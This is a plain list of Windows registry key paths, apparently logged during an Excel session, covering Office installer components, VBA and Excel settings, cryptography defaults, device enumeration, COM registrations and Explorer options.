HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F42A44DCD7760CE50846DA6A72E5C79C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AA2C515FAEDCE9D5BB659048B0B6AF44\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F7A2736027814E451B7FE0B228BE5F93\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A83CF6BA9BA77CF53AF6E524D189CF85\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A5CA170E078EF9153BC926846308E031\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D5CE80FB5AC2CF65FA8E9630A307B827\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0D79D6593391AD152AB8B27CA2AFD46C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C40BD26AE79233E55A8EB8895537A817\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FE79B46EDF7C68054BD47FAA669C0F6A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\56840192274C3E455910A23F2CAFA486\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3A0924178557BC557B864BAAA1B8BBD2\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C671DA123A623AF51B38878992340DC5\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7C926ACEBB54B1A548CED3DEE1FE43CA\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1BBFA2820115E9A568FF98C2947F08BF\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F1B1D222E9023DA5BB72C108F38F4351\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\05AEA06B791154F5EB3682D3FC6E28A3\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DA214CC0B2081C8518A830C140598507\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D38DBC2F4E8327E5EB218D2D922CC84B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BF7D1AC5A810B5E56A7BB563F21C398F\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\179C7CA5F08553450A919BC11A199D4D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6FECD210EDB5CE75D8E6FD5618273106\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A3BF3C3D202AAEC5E9A6626E6D8CD6DD\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BDBBC17C23110AF51AE6666C048FC9A2\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5995A00B683849C5FB7FA38711D2B628\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\88EA05FA683CDBA54BC53CED21517555\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D0A13E5B9DA24B75D88CC563247C4077\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1AEB9CEAEA7409D52A08E698D9F5545E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D9FB2AE326A9D495EBCE17FD21B49DB3\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0D494A43550B63E5D90DBB12FD7B52C2\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\99817C233AF4D0D54BF2551DFAF35BDC\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\746512AEFC6122D5084C6A88B1C9F29C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A22659CCEF48A8F5AB5DF0571E461EFD\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\38A470AC7F2132F50813B9770ED5B261\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3082592211BE5A4549CADB2E6FD2353A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A21AC394AA15FC45BADAFC29C81786E5\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\16A5C9F62BAE1B850BDF92BE8BDC065E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\176504F99FFFA535B83859A366DFA00E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7A6D8B24B85E9325D9652DD32F585ADF\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4B279B718842E43558F5A76E8CD91FD5\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B813605A9EA4C455CABB7CB6C6E9130A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\67D2EC8CFC167525A94A5BC7E144333A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A3D9FF2344277A25A9D9B89D63AAE861\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4239D8B225FD17359ADB4DD186E034CA\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\410BCE31B8EF88F55B8A45EEE4A56948\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5C39EAC199B7C92568B11750B7085F1F\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\907E7A0CC11B9375BAFE99956DBDE71B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0ECF536A0FC41575A93F78BF09950DCC\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4809AA2DF4CFCEE5ABD3E4D7F312A014\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E811AEC31EF68C1508545E0F365CB7DC\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DD472E42C51B0AB539442C365F3EFE81\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5E547612A1D42A955A40D1E4432AF329\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A94CA8ABA9A99C9598D9A78D7A6A8C73\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F56E4E9352099925286C014C79242183\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E7FF8515F21145850959F0B78055A84A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0750A4730C266FA5B8D1181D57211E6C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0C62291B244AA6653BC86EDA89BF31E8\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E36CCA28A7D47A75BAF8A226E24DCB3A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\89CFAE503A820AC56AA95A736071ADA5\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0FA7E207402F1CB54A8B90E8EB5BB922\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E8C4122CEE53E1551A5B818833CA7799\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CD6909398BEC48A51BAA2C2B6BF4DF48\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\64960683A17D56D5EA1238CE53DE45FD\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C5BAD414826581656ABB097131FDE0E3\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\EXCEL.EXE\RequiredFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\EXCEL.EXE\Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\!zm
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Enhanced RSA and AES Cryptographic Provider\Image Path
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MsoHeapInit
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\RequireDeclaration
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\CompileOnDemand
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\NotifyUserBeforeStateLoss
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\BackGroundCompile
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\BreakOnAllErrors
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\BreakOnServerErrors
HKEY_CURRENT_USER\Software\Microsoft\Direct3D\DLLMergeDisable
HKEY_CURRENT_USER\Control Panel\Desktop\CaretWidth
HKEY_CURRENT_USER\Control Panel\Desktop\CursorBlinkRate
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\VbaCapability
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane11
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane12
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane13
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane14
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane15
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane16
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\FriendlyName
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\LabelText
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\Save
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\ShowButtons
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\ShowIndicators
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoLabelOption
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoSaveOption
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoButtonOption
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoIndicatorOption
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Enhanced RSA and AES Cryptographic Provider\Type
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\MachineGuid
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\0"o
HKEY_CURRENT_USER\SOFTWARE\IM Providers\DefaultIMApp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\ConfigFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_293E&SUBSYS_11001AF4&REV_03\3&267a616a&1&20\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\SecurityDescriptors\ActivePowerScheme
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\ActivePowerScheme
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\SecurityDescriptors\381b4222-f694-41f0-9685-ff5bb260df2e
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\SecurityDescriptors\94ac6d29-73ce-41a6-809f-6363ba21b47e
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerSettings\238C9FA8-0AAD-41ED-83F4-97BE242C8F20\94AC6D29-73CE-41A6-809F-6363BA21B47E\DefaultPowerSchemeValues\381b4222-f694-41f0-9685-ff5bb260df2e\ACSettingIndex
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerSettings\238C9FA8-0AAD-41ED-83F4-97BE242C8F20\94AC6D29-73CE-41A6-809F-6363BA21B47E\ValueMin
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerSettings\238C9FA8-0AAD-41ED-83F4-97BE242C8F20\94AC6D29-73CE-41A6-809F-6363BA21B47E\1\SettingValue
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\SecurityDescriptors\a7066653-8d6c-40a8-910e-a1f54b84c7e5
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerSettings\4f971e89-eebd-4455-a8de-9e59040e7347\A7066653-8D6C-40A8-910E-A1F54B84C7E5\DefaultPowerSchemeValues\381b4222-f694-41f0-9685-ff5bb260df2e\ACSettingIndex
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerSettings\4f971e89-eebd-4455-a8de-9e59040e7347\A7066653-8D6C-40A8-910E-A1F54B84C7E5\ValueMin
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerSettings\4f971e89-eebd-4455-a8de-9e59040e7347\A7066653-8D6C-40A8-910E-A1F54B84C7E5\0\SettingValue
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{47a0046c-d161-11f0-81ab-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{47a0046c-d161-11f0-81ab-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\DeviceDesc
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Control Panel\International\LocaleName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Data
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutWave\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\#eLineOutWave\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000\Data
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\ProgID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\DllSurrogate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LaunchPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\LegacyAuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\LegacyImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LoadUserSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2476309959-3960023044-3115063449-1000\ProfileImagePath
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{35786D3C-B075-49b9-88DD-029876E11C01}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{640167b4-59b0-47a6-b335-a6b3c0695aea}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{9113A02D-00A3-46B9-BC5F-9C04DADDD5D7}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{b155bdf8-02f0-451e-9a26-ae317cfd7779}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Segoe UI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Max Cached Icons
HKEY_CURRENT_USER\Control Panel\Desktop\SmoothScroll
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\TaskbarAnimations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\EnableBalloonTips
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ListviewAlphaSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ListviewShadow
